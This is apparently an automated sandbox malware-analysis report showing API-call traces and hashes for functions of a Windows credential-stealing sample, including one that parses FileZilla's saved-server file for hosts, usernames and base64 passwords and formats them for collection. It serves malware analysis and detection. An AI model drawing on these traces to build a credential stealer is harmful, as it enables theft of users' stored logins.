                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3243516280-0
                                                                                                                                              • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                                                              • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                                                                                                                              • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                                                              • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                                                                                                                              Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                                                              • wsprintfA.USER32 ref: 00417C47
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                              • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                                                              • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                                                                                                                              • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                                                              • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                                                                                                                              Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                              • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                                                              • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                                                                                                                              • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                                                              • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                                                                                                                              Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                              • Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                                                              • Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
                                                                                                                                              • Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                                                              • Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5
                                                                                                                                              Function 00407770 Relevance: 81.6, APIs: 54, Instructions: 584stringmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
                                                                                                                                              • lstrcatA.KERNEL32(?,0099D3D8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 0040798B
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 0040799F
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 004079B2
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 004079C6
                                                                                                                                              • lstrcatA.KERNEL32(?,0099D460,?,00416414,?), ref: 004079DA
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 00407A29
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 00407A3D
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 00407A51
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 00407A64
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0FE8,?,00416414,?), ref: 00407A78
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 00407AC8
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 00407ADB
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 00407AEF
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 00407B03
                                                                                                                                              • lstrcatA.KERNEL32(?,009A1050,?,00416414,?), ref: 00407B16
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 00407B66
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 00407B7A
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 00407B8D
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 00407BA1
                                                                                                                                              • lstrcatA.KERNEL32(?,009A10B8,?,00416414,?), ref: 00407BB5
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 00407C04
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 00407C18
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 00407C2C
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 00407C3F
                                                                                                                                              • lstrcatA.KERNEL32(?,009A1120,?,00416414,?), ref: 00407C53
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0630,?,00416414,?), ref: 00407CA3
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06A8,?,00416414,?), ref: 00407CB6
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0750,?,00416414,?), ref: 00407CCA
                                                                                                                                              • lstrcatA.KERNEL32(?,009A06D8,?,00416414,?), ref: 00407CDE
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,00000000,00000000), ref: 004076A8
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020, : ), ref: 004076BA
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,00000000,00000000,00000000), ref: 004076EF
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,00421934), ref: 00407700
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,00000000,00000000,00000000), ref: 00407733
                                                                                                                                                • Part of subcall function 00407630: lstrcatA.KERNEL32(2727A020,00421938), ref: 0040774D
                                                                                                                                                • Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B
                                                                                                                                              • lstrcatA.KERNEL32(?,009A2030,?,00000104), ref: 00407E6B
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0C68), ref: 00407E7E
                                                                                                                                              • lstrlenA.KERNEL32(2727A020), ref: 00407E8B
                                                                                                                                              • lstrlenA.KERNEL32(2727A020), ref: 00407E9B
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 928082926-0
                                                                                                                                              • Opcode ID: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
                                                                                                                                              • Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
                                                                                                                                              • Opcode Fuzzy Hash: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
                                                                                                                                              • Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55
                                                                                                                                              Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 825 4103b0-41044c call 41aa50 call 418f70 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41aab0 call 40a110 848 410452-410469 call 418fc0 825->848 849 410886-410899 call 41ab10 call 401550 825->849 848->849 855 41046f-4104cf strtok_s call 41aa50 * 4 GetProcessHeap HeapAlloc 848->855 865 4104d2-4104d6 855->865 866 4107ea-410881 lstrlenA call 41aab0 call 401590 call 4153e0 call 41ab10 memset call 41ad50 * 4 call 41ab10 * 4 865->866 867 4104dc-4104ed StrStrA 865->867 866->849 868 410526-410537 StrStrA 867->868 869 4104ef-410521 lstrlenA call 418a70 call 41abb0 call 41ab10 867->869 872 410570-410581 StrStrA 868->872 873 410539-41056b lstrlenA call 418a70 call 41abb0 call 41ab10 868->873 869->868 875 410583-4105b5 lstrlenA call 418a70 call 41abb0 call 41ab10 872->875 876 4105ba-4105cb StrStrA 872->876 873->872 875->876 882 4105d1-410623 lstrlenA call 418a70 call 41abb0 call 41ab10 call 41ade0 call 40a210 876->882 883 410659-41066b call 41ade0 lstrlenA 876->883 882->883 926 410625-410654 call 41ab30 call 41acc0 call 41abb0 call 41ab10 882->926 898 410671-410683 call 41ade0 lstrlenA 883->898 899 4107cf-4107e5 strtok_s 883->899 898->899 912 410689-41069b call 41ade0 lstrlenA 898->912 899->865 912->899 921 4106a1-4106b3 call 41ade0 lstrlenA 912->921 921->899 930 4106b9-4107ca lstrcatA * 3 call 41ade0 lstrcatA * 2 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ab30 * 4 921->930 926->883 930->899
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                              • strtok_s.MSVCRT ref: 0041047B
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                                                                                                                                • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                                                                                                                                • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00410587
                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                                                                                                                              • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                                                                                                                              • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                                                                                                                              • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                                                                                                                              • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                                                                                                                              • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                                                                                                                              • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                                                                                                                              • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                                                                                                                              • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                                                                                                                              • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                                                                                                                              • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                                                                                                                              • strtok_s.MSVCRT ref: 004107D9
                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                                                                                                                              • memset.MSVCRT ref: 0041083D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                              • API String ID: 337689325-555421843
                                                                                                                                              • Opcode ID: b53e72d7009b62f33483af3bb4e4dc8acd4b8ebc14809f9c864481b4fa1a9400
                                                                                                                                              • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                                                                                                                              • Opcode Fuzzy Hash: b53e72d7009b62f33483af3bb4e4dc8acd4b8ebc14809f9c864481b4fa1a9400
                                                                                                                                              • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
